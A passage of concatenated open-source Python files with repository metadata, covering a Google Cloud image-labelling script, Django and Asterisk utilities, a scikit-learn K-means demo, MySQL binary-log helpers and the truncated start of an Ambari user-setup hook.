        q="name='%s'" % fname,
        fields='files(id,name,mimeType,modifiedTime)',
    ).execute().get('files', [])
    if not matches:
        return None
    # use first matching file
    chosen = matches[0]
    payload = DRIVE.files().get_media(fileId=chosen['id']).execute()
    return chosen['name'], chosen['mimeType'], chosen['modifiedTime'], payload
def gcs_blob_upload(fname, bucket, media, mimetype):
    """Upload an object to a Google Cloud Storage bucket.

    Returns the inserted object's {'bucket', 'name'} metadata.
    """
    metadata = {'name': fname, 'uploadType': 'multipart', 'contentType': mimetype}
    upload = http.MediaIoBaseUpload(io.BytesIO(media), mimetype)
    return GCS.objects().insert(
        bucket=bucket, body=metadata, media_body=upload,
        fields='bucket,name').execute()
def vision_label_img(img, top):
    """Send a base64-encoded image to the Vision API for label annotation.

    Returns a comma-separated "(score%) label" string for the top labels,
    or None when the response carries no annotations key.
    """
    request = {
        'image': {'content': img},
        'features': [{'type': 'LABEL_DETECTION', 'maxResults': top}],
    }
    rsp = VISION.images().annotate(
        body={'requests': [request]}).execute().get('responses', [{}])[0]
    # return top labels for image as CSV for Sheet (row)
    if 'labelAnnotations' not in rsp:
        return None
    return ', '.join('(%.2f%%) %s' % (label['score']*100., label['description'])
                     for label in rsp['labelAnnotations'])
def sheet_append_row(sheet, row):
    """Append one row to Sheet1 of the given spreadsheet.

    Returns the number of cells added, or None on an empty API response.
    """
    result = SHEETS.spreadsheets().values().append(
        spreadsheetId=sheet, range='Sheet1',
        valueInputOption='USER_ENTERED', body={'values': [row]},
    ).execute()
    if not result:
        return None
    return result.get('updates').get('updatedCells')
def main(fname, bucket, sheet_id, folder, top, debug):
    '''"main()" drives process from image download through report generation.

    Returns True on success; returns None as soon as any stage fails.
    '''
    # Stage 1: fetch the image and its metadata from Drive.
    fetched = drive_get_img(fname)
    if not fetched:
        return
    fname, mtype, ftime, data = fetched
    if debug:
        print('Downloaded %r (%s, %s, size: %d)' % (fname, mtype, ftime, len(data)))

    # Stage 2: archive the bytes to Cloud Storage under folder/filename.
    gcsname = '%s/%s' % (folder, fname)
    uploaded = gcs_blob_upload(gcsname, bucket, data, mtype)
    if not uploaded:
        return
    if debug:
        print('Uploaded %r to GCS bucket %r' % (uploaded['name'], uploaded['bucket']))

    # Stage 3: label the image via the Vision API (expects base64 text).
    labels = vision_label_img(base64.b64encode(data).decode('utf-8'), top)
    if not labels:
        return
    if debug:
        print('Top %d labels from Vision API: %s' % (top, labels))

    # Stage 4: record one report row (with a hyperlink to the archive).
    row = [folder,
           '=HYPERLINK("storage.cloud.google.com/%s/%s", "%s")' % (
               bucket, gcsname, fname), mtype, ftime, k_ize(len(data)), labels]
    cells = sheet_append_row(sheet_id, row)
    if not cells:
        return
    if debug:
        print('Added %d cells to Google Sheet' % cells)
    return True
if __name__ == '__main__':
    # args: [-hv] [-i imgfile] [-b bucket] [-f folder] [-s Sheet ID] [-t top labels]
    parser = argparse.ArgumentParser()
    # BUG FIX: these options take a value, but were declared with
    # action="store_true", which makes argparse treat them as no-argument
    # flags (storing True) and reject/ignore any supplied value. Using the
    # default 'store' action lets "-i photo.jpg" etc. actually override the
    # module-level defaults. -t additionally gets type=int so the Vision
    # maxResults parameter is numeric rather than a string.
    parser.add_argument("-i", "--imgfile",
            default=FILE, help="image file filename")
    parser.add_argument("-b", "--bucket_id",
            default=BUCKET, help="Google Cloud Storage bucket name")
    parser.add_argument("-f", "--folder",
            default=PARENT, help="Google Cloud Storage image folder")
    parser.add_argument("-s", "--sheet_id",
            default=SHEET, help="Google Sheet Drive file ID (44-char str)")
    parser.add_argument("-t", "--viz_top", type=int,
            default=TOP, help="return top N (default %d) Vision API labels" % TOP)
    parser.add_argument("-v", "--verbose", action="store_true",
            default=DEBUG, help="verbose display output")
    args = parser.parse_args()

    print('Processing file %r... please wait' % args.imgfile)
    rsp = main(args.imgfile, args.bucket_id,
            args.sheet_id, args.folder, args.viz_top, args.verbose)
    if rsp:
        sheet_url = 'https://docs.google.com/spreadsheets/d/%s/edit' % args.sheet_id
        print('DONE: opening web browser to it, or see %s' % sheet_url)
        webbrowser.open(sheet_url, new=1, autoraise=True)
    else:
        print('ERROR: could not process %r' % args.imgfile)
| googlecodelabs/analyze_gsimg | alt/analyze_gsimg-newauth.py | Python | apache-2.0 | 7,125 |
# Copyright 2012 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Django command: start a database shell.
Overrides the default implementation.
"""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
str = None
__metaclass__ = type
__all__ = ['Command']
from django.core.management.commands import dbshell
from maasserver.testing.database import MAASClusterFixture
class Command(dbshell.Command):
    """Customized "dbshell" command.

    Runs the shell against the test-cluster fixture so the database is
    torn down cleanly when the shell exits.
    """

    def handle(self, **options):
        # Don't call up to Django's dbshell, because that ends up exec'ing the
        # shell, preventing this from clearing down the fixture.
        with MAASClusterFixture(options.get('database')) as cluster:
            cluster.shell(cluster.dbname)
| cloudbase/maas | src/maasserver/management/commands/dbshell.py | Python | agpl-3.0 | 852 |
# Higgins - A multi-media server
# Copyright (c) 2007-2009 Michael Frank <msfrank@syntaxjockey.com>
#
# This program is free software; for license information see
# the COPYING file.
from higgins.logger import Loggable
class UPnPLogger(Loggable):
    # Log domain under which all UPnP messages are emitted.
    log_domain = "upnp"

# Shared module-level logger instance for the UPnP package.
logger = UPnPLogger()
"""Pluggable module registries
Copyright (C) 2014, Digium, Inc.
Kinsey Moore <kmoore@digium.com>
This program is free software, distributed under the terms of
the GNU General Public License Version 2.
"""
import logging
import re
LOGGER = logging.getLogger(__name__)
class PluggableRegistry(object):
    """Registry mapping string keys to pluggable module factories."""

    def __init__(self):
        self.registry = {}

    def register(self, key, factory):
        """Register a module factory under key (overwrites any existing entry)."""
        self.registry[key] = factory

    def check(self, key):
        """Check whether a module factory exists for the given key."""
        # Idiom fix: return the membership test directly instead of the
        # if/return True/return False chain.
        return key in self.registry

    def get_class(self, key):
        """Get the class for a module; raises KeyError when unregistered."""
        return self.registry[key]
PLUGGABLE_EVENT_REGISTRY = PluggableRegistry()
PLUGGABLE_ACTION_REGISTRY = PluggableRegistry()
def var_replace(text, values):
    """ perform variable replacement on text
    This allows a parameters to be written to include variables from the
    arbitrarily structured object provided by an ARI or AMI event like so:
    from ARI to ARI: Uri: 'playbacks/{playback.id}/control'
    from AMI to AMI: Channel: '{channel}'
    from AMI to ARI: Uri: 'channels/{uniqueid}/play'
    from ARI to AMI: Channel: '{channel.name}'
    :param text: text with optional {var} entries
    :param values: nested dict of values to get replacement values from
    """
    # Non-strings (ints, dicts, ...) pass through untouched.
    if not isinstance(text, str):
        return text
    for placeholder in re.findall(r'(?<!\\){[^}]*(?<!\\)}', text):
        # Walk the dotted path ("a.b.c") down through the nested dict.
        current = values
        for part in placeholder[1:-1].split('.'):
            if part not in current:
                LOGGER.error('Unable to replace variables in %s from %s',
                             text, values)
                return None
            current = current[part]
        text = text.replace(placeholder, current)
    return text
| asterisk/testsuite | lib/python/asterisk/pluggable_registry.py | Python | gpl-2.0 | 1,893 |
DEFAULT_BOX = ('precise64', 'http://files.vagrantup.com/precise64.box') | pdiazv/minty | mt-vagrant/mt_vagrant/settings.py | Python | mit | 71 |
"""
===========================================================
A demo of K-Means clustering on the handwritten digits data
===========================================================
In this example we compare the various initialization strategies for
K-means in terms of runtime and quality of the results.
As the ground truth is known here, we also apply different cluster
quality metrics to judge the goodness of fit of the cluster labels to the
ground truth.
Cluster quality metrics evaluated (see :ref:`clustering_evaluation` for
definitions and discussions of the metrics):
=========== ========================================================
Shorthand full name
=========== ========================================================
homo homogeneity score
compl completeness score
v-meas V measure
ARI adjusted Rand index
AMI adjusted mutual information
silhouette silhouette coefficient
=========== ========================================================
"""
print(__doc__)
from time import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.cluster import KMeans
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn.preprocessing import scale
np.random.seed(42)  # fixed seed so runs are reproducible

digits = load_digits()
data = scale(digits.data)  # standardize features to zero mean / unit variance

n_samples, n_features = data.shape
n_digits = len(np.unique(digits.target))  # 10 classes, digits 0-9
labels = digits.target

sample_size = 300  # subsample used for the (expensive) silhouette score

print("n_digits: %d, \t n_samples %d, \t n_features %d"
      % (n_digits, n_samples, n_features))

print(79 * '_')
# NOTE(review): the two adjacent string literals below are concatenated
# BEFORE the % formatting is applied, so '% 9s' formats the whole header
# line at once; a '+' after % 'init' was probably intended. The printed
# header is still readable, so the code is left as-is.
print('% 9s' % 'init'
' time inertia homo compl v-meas ARI AMI silhouette')
def bench_k_means(estimator, name, data):
    """Fit `estimator` on `data` and print one benchmark row: fit time,
    inertia, and clustering-quality metrics against the module-level
    ground-truth `labels` (silhouette uses `sample_size` points)."""
    t0 = time()
    estimator.fit(data)
    print('% 9s %.2fs %i %.3f %.3f %.3f %.3f %.3f %.3f'
          % (name, (time() - t0), estimator.inertia_,
             metrics.homogeneity_score(labels, estimator.labels_),
             metrics.completeness_score(labels, estimator.labels_),
             metrics.v_measure_score(labels, estimator.labels_),
             metrics.adjusted_rand_score(labels, estimator.labels_),
             metrics.adjusted_mutual_info_score(labels, estimator.labels_),
             metrics.silhouette_score(data, estimator.labels_,
                                      metric='euclidean',
                                      sample_size=sample_size)))
# Benchmark the three seeding strategies on the full 64-d data.
bench_k_means(KMeans(init='k-means++', n_clusters=n_digits, n_init=10),
              name="k-means++", data=data)

bench_k_means(KMeans(init='random', n_clusters=n_digits, n_init=10),
              name="random", data=data)

# in this case the seeding of the centers is deterministic, hence we run the
# kmeans algorithm only once with n_init=1
pca = PCA(n_components=n_digits).fit(data)
bench_k_means(KMeans(init=pca.components_, n_clusters=n_digits, n_init=1),
              name="PCA-based",
              data=data)
print(79 * '_')

###############################################################################
# Visualize the results on PCA-reduced data

reduced_data = PCA(n_components=2).fit_transform(data)
kmeans = KMeans(init='k-means++', n_clusters=n_digits, n_init=10)
kmeans.fit(reduced_data)

# Step size of the mesh. Decrease to increase the quality of the VQ.
h = .02  # point in the mesh [x_min, m_max]x[y_min, y_max].

# Plot the decision boundary. For that, we will assign a color to each
# point of the mesh grid below.
# NOTE(review): min() + 1 / max() - 1 shrinks the plotted range; the usual
# idiom is min() - 1 / max() + 1 to pad it — confirm intent.
x_min, x_max = reduced_data[:, 0].min() + 1, reduced_data[:, 0].max() - 1
y_min, y_max = reduced_data[:, 1].min() + 1, reduced_data[:, 1].max() - 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))

# Obtain labels for each point in mesh. Use last trained model.
Z = kmeans.predict(np.c_[xx.ravel(), yy.ravel()])

# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure(1)
plt.clf()
plt.imshow(Z, interpolation='nearest',
           extent=(xx.min(), xx.max(), yy.min(), yy.max()),
           cmap=plt.cm.Paired,
           aspect='auto', origin='lower')

plt.plot(reduced_data[:, 0], reduced_data[:, 1], 'k.', markersize=2)
# Plot the centroids as a white X
centroids = kmeans.cluster_centers_
plt.scatter(centroids[:, 0], centroids[:, 1],
            marker='x', s=169, linewidths=3,
            color='w', zorder=10)
plt.title('K-means clustering on the digits dataset (PCA-reduced data)\n'
          'Centroids are marked with white cross')
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())
plt.show()
"""
Utils to be used by third_party_auth app.
This helps to reduce merge conflicts.
"""
import re
from random import randrange
from django.conf import settings
def clean_username(suggested_username):
    """
    Cleans the username if APPSEMBLER_FEATURES.ENABLE_THIRD_PARTY_AUTH_CLEAN_USERNAMES is set.
    if the FEATURE flag ENABLE_THIRD_PARTY_AUTH_CLEAN_USERNAMES is set to
    True we clean all special chars from the username, this feature is
    configurable by this three env settings with this default:
        TPA_CLEAN_USERNAMES_KEEP_DOMAIN_PART: false
        TPA_CLEAN_USERNAMES_REPLACER_CHAR: ""
        TPA_CLEAN_USERNAMES_ADD_RANDOM_INT: false
    You can override this three in your settings.
    """
    if settings.APPSEMBLER_FEATURES.get("ENABLE_THIRD_PARTY_AUTH_CLEAN_USERNAMES"):
        if not settings.TPA_CLEAN_USERNAMES_KEEP_DOMAIN_PART:
            # If the username looks like an email address, keep only the
            # local part (before the '@').
            if len(
                re.findall(r'[^@]+@[^@]+\.[^@]+', suggested_username)
            ) > 0:
                suggested_username = suggested_username.split('@')[0]
        # Strip every non-alphanumeric character (or substitute the
        # configured replacer char).
        suggested_username = re.sub(
            r'[^a-zA-Z0-9]',
            settings.TPA_CLEAN_USERNAMES_REPLACER_CHAR,
            suggested_username
        )
        if settings.TPA_CLEAN_USERNAMES_ADD_RANDOM_INT:
            # Truncate to 27 chars so the 3-digit suffix fits the 30-char cap.
            # NOTE(review): randrange(100, 999) yields 100-998 — 999 is
            # excluded; randrange(100, 1000) was probably intended.
            suggested_username = suggested_username[:27] if len(suggested_username) > 27 else suggested_username
            suggested_username += str(randrange(100, 999))
        else:
            suggested_username = suggested_username[:30] if len(suggested_username) > 30 else suggested_username
    return suggested_username
def get_fullname(details, default_fullname):
    """
    Merges first and last name with a space if
    APPSEMBLER_FEATURES.ENABLE_THIRD_PARTY_AUTH_MERGE_FIRST_LAST_NAME is
    true; otherwise returns default_fullname unchanged.
    """
    if not settings.APPSEMBLER_FEATURES.get('ENABLE_THIRD_PARTY_AUTH_MERGE_FIRST_LAST_NAME', False):
        return default_fullname
    return "%s %s" % (details.get('first_name', ''), details.get('last_name', ''))
| gymnasium/edx-platform | common/djangoapps/appsembler/third_party_auth_utils.py | Python | agpl-3.0 | 2,066 |
from enum import Enum
from collections import namedtuple
import settings
import os
import dbaccess
import urllib.request
import ast
import shutil
def move_file(filename, src, dest):
    """Move `filename` from directory `src` into directory `dest`."""
    shutil.move(os.path.join(src, filename), os.path.join(dest, filename))
def create_file(filename, path):
    """Create an empty `filename` inside directory `path` (truncates an
    existing file of the same name)."""
    with open(os.path.join(path, filename), 'w+'):
        pass
def delete_file(filename, path):
    """Remove `filename` from directory `path`; raises OSError if absent."""
    target = os.path.join(path, filename)
    os.remove(target)
def delete_directory(directory):
    """Remove an empty directory; raises OSError if non-empty or missing."""
    os.rmdir(directory)
def get_problem_name(number):
    """Fetch a UVa problem's title from the uHunt web API.

    Performs a blocking HTTP GET; raises urllib.error.URLError on network
    failure and KeyError if the response carries no "title" field.
    """
    import json  # local import: json is not imported at module level
    url = "http://uhunt.felix-halim.net/api/p/id/{0}".format(number)
    with urllib.request.urlopen(url) as response:
        payload = response.read().decode('utf-8')
    # BUG FIX: the endpoint returns JSON. ast.literal_eval only accepts
    # Python literals and raises ValueError on JSON's true/false/null
    # tokens; json.loads parses the response correctly in all cases.
    return json.loads(payload)["title"]
class Language(Enum):
    # Member values (0-3) double as the language_id stored in the database.
    C, CPP, JAVA, PYTHON = range(4)

# Source-file extension used for each language when naming attempt files.
language_extensions = {
    Language.C: 'c',
    Language.CPP: 'cpp',
    Language.JAVA: 'java',
    Language.PYTHON: 'py'}
class Status(Enum):
    """Lifecycle states of a problem attempt; the value doubles as the
    status_id stored in the database."""
    TEMPORARY = 0
    WORKING = 1
    PAUSED = 2
    FINISHED = 3
    ARCHIVED = 4

    @staticmethod
    def get_directory(status):
        """Repository sub-directory for a status: its lower-cased name."""
        return status.name.lower()
class ProblemData(object):
    """Value object for one attempt at an online-judge problem.

    Equality is defined by the (problem_id, attempt_no) pair; comparing
    against a falsy value (e.g. None) is never equal.
    """

    def __init__(self, problem_id, name, category_id=None):
        self.problem_id = problem_id
        self.name = name
        self.category_id = category_id
        # Attempt-specific fields, filled in later by ProblemManager.
        self.language = None
        self.attempt_no = None
        self.status = None
        self.source_file = None
        self.input_file = None
        self.output_file = None

    def __eq__(self, other):
        return bool(other) and (self.problem_id == other.problem_id
                                and self.attempt_no == other.attempt_no)

    def __ne__(self, other):
        if not other:
            return True
        return (self.problem_id != other.problem_id
                or self.attempt_no != other.attempt_no)
class ProblemNotFound(Exception):
    """Raised when a requested problem/attempt is absent from the database."""
    pass
class ProblemManager(object):
def __get_problem_from_db(self, problem_id):
result = dbaccess.read('problem', where={'id': problem_id})
if result:
result = result[0]
problem = ProblemData(result[0], result[1], result[2])
return problem
else:
return None
def create_files(self, problem):
path = os.path.join(settings.get('repo_path'), Status.get_directory(problem.status))
create_file(problem.source_file, path)
create_file(problem.input_file, path)
create_file(problem.output_file, path)
def create_data(self, problem):
result = dbaccess.read('problem', where={'id': problem.problem_id})
if not result:
dbaccess.insert('problem', data={'id': problem.problem_id,
'name': problem.name, 'category_id': problem.category_id})
result = dbaccess.read('problem_attempt', where={'problem_id': problem.problem_id})
attempt_no = len(result)
attempt_no += 1
dbaccess.insert('problem_attempt',
data={'problem_id': problem.problem_id, 'attempt_no': attempt_no,
'language_id': problem.language.value, 'status_id': problem.status.value})
def delete_files(self, problem):
path = os.path.join(settings.get('repo_path'), Status.get_directory(problem.status))
delete_file(problem.source_file, path)
delete_file(problem.input_file, path)
delete_file(problem.output_file, path)
def delete_data(self, problem):
dbaccess.delete('problem_attempt',
where={'problem_id': problem.problem_id,
'attempt_no': problem.attempt_no})
result = dbaccess.read('problem_attempt',
where={'problem_id': problem.problem_id})
if not result:
dbaccess.delete('problem', where={'id': problem.problem_id})
def set_status(self, status, problem):
src_dir = Status.get_directory(problem.status)
src_dir = os.path.join(settings.get('repo_path'), src_dir)
problem.status = status
dest_dir = Status.get_directory(problem.status)
dest_dir = os.path.join(settings.get('repo_path'), dest_dir)
move_file(problem.source_file, src_dir, dest_dir)
move_file(problem.input_file, src_dir, dest_dir)
move_file(problem.output_file, src_dir, dest_dir)
dbaccess.update(
'problem_attempt',
data={'status_id': problem.status.value},
where={'problem_id': problem.problem_id,
'attempt_no': problem.attempt_no})
    def get_data_for_new(self, problem_id, language):
        """Build a ProblemData for a brand-new attempt at a problem.

        Looks the problem up in the database; when absent, a fresh
        ProblemData is created from the fetched problem name. The new
        attempt gets status TEMPORARY and the next attempt number.
        """
        problem = self.__get_problem_from_db(problem_id)
        if not problem:
            # Problem never attempted before: resolve its display name.
            name = get_problem_name(problem_id)
            problem = ProblemData(problem_id, name, None)
        problem.language = language
        result = dbaccess.read('problem_attempt', where={'problem_id': problem_id})
        problem.attempt_no = len(result) + 1
        problem.status = Status.TEMPORARY
        # File names follow the '<id>.<ext>' convention.
        prefix = str(problem_id) + '.'
        problem.source_file = prefix + language_extensions[language]
        problem.input_file = prefix + 'in'
        problem.output_file = prefix + 'out'
        return problem
def get_data(self, problem_id, attempt_no):
problem = self.__get_problem_from_db(problem_id)
result = dbaccess.read('problem_attempt',
columns=['status_id', 'language_id'],
where={'problem_id': problem_id, 'attempt_no': attempt_no})
if not result:
message = ' '.join(['Problem:', str(problem_id), 'was not found on the database.'])
raise ProblemNotFound(message)
problem.attempt_no = attempt_no
problem.status = Status(result[0][0])
problem.language = Language(result[0][1])
prefix = str(problem_id) + '.'
problem.source_file = prefix + language_extensions[problem.language]
problem.input_file = prefix + 'in'
problem.output_file = prefix + 'out'
return problem
    def update_category(self, problem):
        """Persist the problem's (possibly changed) category assignment."""
        dbaccess.update('problem', data={'category_id': problem.category_id}, where={'id': problem.problem_id})
| thyagostall/apollo | src/problem.py | Python | mit | 6,320 |
#
# Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
"""
This file contains common features to manage and handle binary log files.
"""
import io
import errno
import os
import shutil
import time
from datetime import datetime
from mysql.utilities.exception import UtilError
# Known binary log categories.
LOG_TYPES = ['bin', 'relay', 'all']
LOG_TYPE_BIN, LOG_TYPE_RELAY, LOG_TYPE_ALL = LOG_TYPES

# Seconds in one day; used when filtering logs by elapsed days.
_DAY_IN_SECONDS = 86400


def is_binary_log_filename(filename, log_type=LOG_TYPE_ALL, basename=None):
    """Check whether *filename* looks like a binary log file name.

    A binary log file name is '<base>.nnnnnn' where the extension is a
    sequence number. When *basename* is given, the base must match it
    exactly. Otherwise the default server naming is assumed, depending on
    *log_type*: '*-bin.nnnnnn' for 'bin' (excluding relay logs),
    '*-relay-bin.nnnnnn' for 'relay', and both for 'all'.

    filename[in]   Filename to check.
    log_type[in]   One of 'bin', 'relay' or 'all' (default 'all').
    basename[in]   Explicit basename to require, or None for the defaults.

    Returns True when the name matches, False otherwise. Raises UtilError
    for an unsupported log_type.
    """
    base, extension = os.path.splitext(filename)
    sequence = extension[1:]  # drop the leading '.'

    if basename:
        # An explicitly requested basename must match exactly.
        if base != basename:
            return False
    elif log_type == LOG_TYPE_BIN:
        # '*-bin.nnnnnn' but never a relay log.
        if not base.endswith('-bin') or base.endswith('-relay-bin'):
            return False
    elif log_type == LOG_TYPE_RELAY:
        # '*-relay-bin.nnnnnn'
        if not base.endswith('-relay-bin'):
            return False
    elif log_type == LOG_TYPE_ALL:
        # '*-bin.nnnnnn', relay logs included.
        if not base.endswith('-bin'):
            return False
    else:
        raise UtilError("Unsupported log-type: {0}".format(log_type))

    # The extension must parse as a sequence number.
    try:
        int(sequence)
    except ValueError:
        return False
    return True
def get_index_file(source, binary_log_file):
    """Locate the index file for the given binary log.

    source[in]           Directory to search for the index file.
    binary_log_file[in]  Binary log file the index belongs to.

    Returns the full path of the '<base>.index' file. Raises UtilError when
    it does not exist in *source*.
    """
    base_name = os.path.splitext(binary_log_file)[0]
    index_path = os.path.join(source, '{0}.index'.format(base_name))
    if not os.path.isfile(index_path):
        raise UtilError("Unable to find the index file associated to file "
                        "'{0}'.".format(binary_log_file))
    return index_path
def filter_binary_logs_by_sequence(filenames, seq_list):
    """Keep the filenames whose sequence-number extension matches seq_list.

    seq_list may mix plain integers and (low, high) inclusive interval
    tuples, e.g. [3, (5, 12), 16, 21]. Filenames are assumed to be valid
    binary log names (see is_binary_log_filename()).

    filenames[in]  List of binary log filenames to check.
    seq_list[in]   Allowed sequence numbers and/or intervals.

    Returns the list of matching filenames, in the original order.
    """
    def _matches(seq_num):
        # True when seq_num equals an allowed value or falls in an interval.
        for allowed in seq_list:
            if isinstance(allowed, tuple):
                if allowed[0] <= seq_num <= allowed[1]:
                    return True
            elif seq_num == allowed:
                return True
        return False

    matched = []
    for name in filenames:
        extension = os.path.splitext(name)[1]
        if _matches(int(extension[1:])):  # strip the dot, compare as int
            matched.append(name)
    return matched
def filter_binary_logs_by_date(filenames, source, max_date):
    """Filter filenames according to their last modification date.

    Keep the files whose last modification happened before *max_date*;
    more recently changed files are excluded.

    filenames[in]  List of binary log filenames to check (assumed valid,
                   see is_binary_log_filename()).
    source[in]     Directory where the files are located.
    max_date[in]   Either a date ('yyyy-mm-dd'), a date/time
                   ('yyyy-mm-ddThh:mm:ss'), or an integer number of days
                   elapsed since the last modification.

    Returns the list of filenames last modified before max_date.
    """
    res_list = []
    # Determine which of the supported formats was given.
    try:
        elapsed_days = int(max_date)
    except ValueError:
        # Not an integer, so treat max_date as a date string (checked below).
        elapsed_days = None
    # Bug fix: use an explicit None check so that '0' is reported as an
    # invalid day count instead of falling through to date parsing and
    # producing a misleading "invalid date format" error.
    if elapsed_days is not None:  # Process the specified number of days
        if elapsed_days < 1:
            raise UtilError(
                "Invalid number of days (must be an integer greater than "
                "zero): {0}".format(max_date)
            )
        # Get current local time with the time-of-day zeroed out, so days
        # are counted from midnight; the current day counts as one.
        ct_list = list(time.localtime())
        ct_list[3] = 0  # hours
        ct_list[4] = 0  # minutes
        ct_list[5] = 0  # seconds
        day_start_time = time.mktime(tuple(ct_list))
        max_time = day_start_time - (_DAY_IN_SECONDS * (elapsed_days - 1))
        max_date = time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(max_time))
    else:  # Process the specified date
        # Validate the format and normalize to the full
        # 'yyyy-mm-ddThh:mm:ss' form used for string comparison below.
        _, _, time_val = max_date.partition('T')
        if time_val:
            try:
                dt_max_date = datetime.strptime(max_date, '%Y-%m-%dT%H:%M:%S')
            except ValueError:
                raise UtilError(
                    "Invalid date/time format (yyyy-mm-ddThh:mm:ss): "
                    "{0}".format(max_date)
                )
        else:
            try:
                dt_max_date = datetime.strptime(max_date, '%Y-%m-%d')
            except ValueError:
                raise UtilError(
                    "Invalid date format (yyyy-mm-dd): {0}".format(max_date)
                )
        max_date = dt_max_date.strftime('%Y-%m-%dT%H:%M:%S')
    # Check the modification date of each file; ISO-formatted timestamps
    # compare correctly as plain strings.
    for filename in filenames:
        source_file = os.path.join(source, filename)
        modified_time = os.path.getmtime(source_file)
        modified_date = time.strftime('%Y-%m-%dT%H:%M:%S',
                                      time.localtime(modified_time))
        if modified_date < max_date:
            res_list.append(filename)
    # Retrieve the resulting filename list (filtered by modified date).
    return res_list
def move_binary_log(source, destination, filename, log_index,
                    undo_on_error=True):
    """Move a binary log file to a specific destination.

    This method moves the given binary log file (filename), located in the
    source directory, to the specified destination directory and updates the
    respective index file accordingly.

    Note: An error is raised if any issue occurs during the process.
    Additionally, if undo_on_error=True (default) then the file is moved
    back to the source directory if an error occurred while updating the
    index file (keeping the file in the original location and the index file
    unchanged). Otherwise the file might be moved and the index file not
    correctly updated. In either case an error is issued.

    source[in]         Source directory where the binary log file is located.
    destination[in]    Destination directory to move the binary log.
    filename[in]       Name of the binary log file to move.
    log_index[in]      Location (full path) of the binary log index file.
    undo_on_error[in]  Flag to undo the file move if an error occurs (when
                       updating the index file) or not. By default True,
                       meaning that the move operation is reverted on error.
    """
    def _move_file_back():
        """Try to move the file back to its original source directory.

        Returns a warning message indicating if the file was moved back
        successfully or not.
        """
        try:
            # Move file back to source directory.
            destination_file = os.path.join(destination, filename)
            shutil.move(destination_file, source)
        except (IOError, shutil.Error) as move_err:
            # Warn the user that an error occurred while trying to
            # move the file back.
            return ("\nWARNING: Failed to move file back to source directory: "
                    "{0}").format(move_err)
        else:
            # Notify user that the file was successfully moved back.
            return "\nWARNING: File move aborted."

    # Move file to destination directory.
    source_file = os.path.join(source, filename)
    if os.path.isdir(destination):
        shutil.move(source_file, destination)
    else:
        # Raise an error if the destination dir does not exist.
        # Note: To be consistent with the IOError raised by shutil.move() if
        # the source file does not exist.
        raise IOError(errno.ENOENT, "No such destination directory",
                      destination)
    # Update index file.
    found_pos = None
    try:
        with io.open(log_index, 'r') as index_file:
            # Read all data from index file.
            data = index_file.readlines()
        # Search for the binary log file entry.
        for pos, line in enumerate(data):
            if line.strip().endswith(filename):
                found_pos = pos
                break
        if found_pos is not None:
            # Replace binary file entry with absolute destination path.
            data[found_pos] = u'{0}\n'.format(
                os.path.join(destination, filename)
            )
        else:
            warning = ""  # No warning if undo_on_error = False.
            if undo_on_error:
                warning = _move_file_back()
            # Raise error (including cause).
            raise UtilError("Entry for file '{0}' not found in index "
                            "file: {1}{2}".format(filename, log_index,
                                                  warning))
        # Create a new temporary index file with the updated entry.
        # Note: original file is safe if something goes wrong during write.
        tmp_file = '{0}.tmp'.format(log_index)
        try:
            with io.open(tmp_file, 'w', newline='\n') as tmp_index_file:
                tmp_index_file.writelines(data)
        except IOError as err:
            warning = ""  # No warning if undo_on_error = False.
            if undo_on_error:
                warning = _move_file_back()
            # Raise error (including cause).
            raise UtilError('Unable to write temporary index file: '
                            '{0}{1}'.format(err, warning))
    except IOError as err:
        warning = ""  # No warning if undo_on_error = False.
        if undo_on_error:
            warning = _move_file_back()
        # Raise error (including cause).
        raise UtilError('Failed to update index file: '
                        '{0}{1}'.format(err, warning))
    # Replace the original index file with the new one.
    if os.name == 'posix':
        os.rename(tmp_file, log_index)
    else:
        # On windows, rename does not work if the target file already exists.
        shutil.move(tmp_file, log_index)
| ioggstream/mysql-utilities | mysql/utilities/common/binary_log_file.py | Python | gpl-2.0 | 14,122 |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import getpass
from copy import copy
from resource_management.libraries.functions.version import compare_versions
from resource_management import *
def setup_users():
    """
    Creates users before cluster installation.

    Skipped entirely when the host is sys-prepped or user/group creation is
    disabled. Note: this is Python 2 code (octal literals like 0775).
    """
    import params
    if not params.host_sys_prepped and not params.ignore_groupsusers_create:
        for group in params.group_list:
            Group(group,
            )
        for user in params.user_list:
            if params.override_uid == "true":
                # Force a deterministic/secure uid for each service user.
                User(user,
                     uid = get_uid(user),
                     gid = params.user_to_gid_dict[user],
                     groups = params.user_to_groups_dict[user],
                )
            else:
                User(user,
                     gid = params.user_to_gid_dict[user],
                     groups = params.user_to_groups_dict[user],
                )
        if params.override_uid == "true":
            set_uid(params.smoke_user, params.smoke_user_dirs)
        else:
            Logger.info('Skipping setting uid for smoke user as host is sys prepped')
    else:
        Logger.info('Skipping creation of User and Group as host is sys prepped or ignore_groupsusers_create flag is on')
        pass
    if params.has_hbase_masters:
        # HBase masters additionally need their tmp dir and (optionally) a
        # secure uid for the hbase user.
        Directory (params.hbase_tmp_dir,
                   owner = params.hbase_user,
                   mode=0775,
                   create_parents = True,
                   cd_access="a",
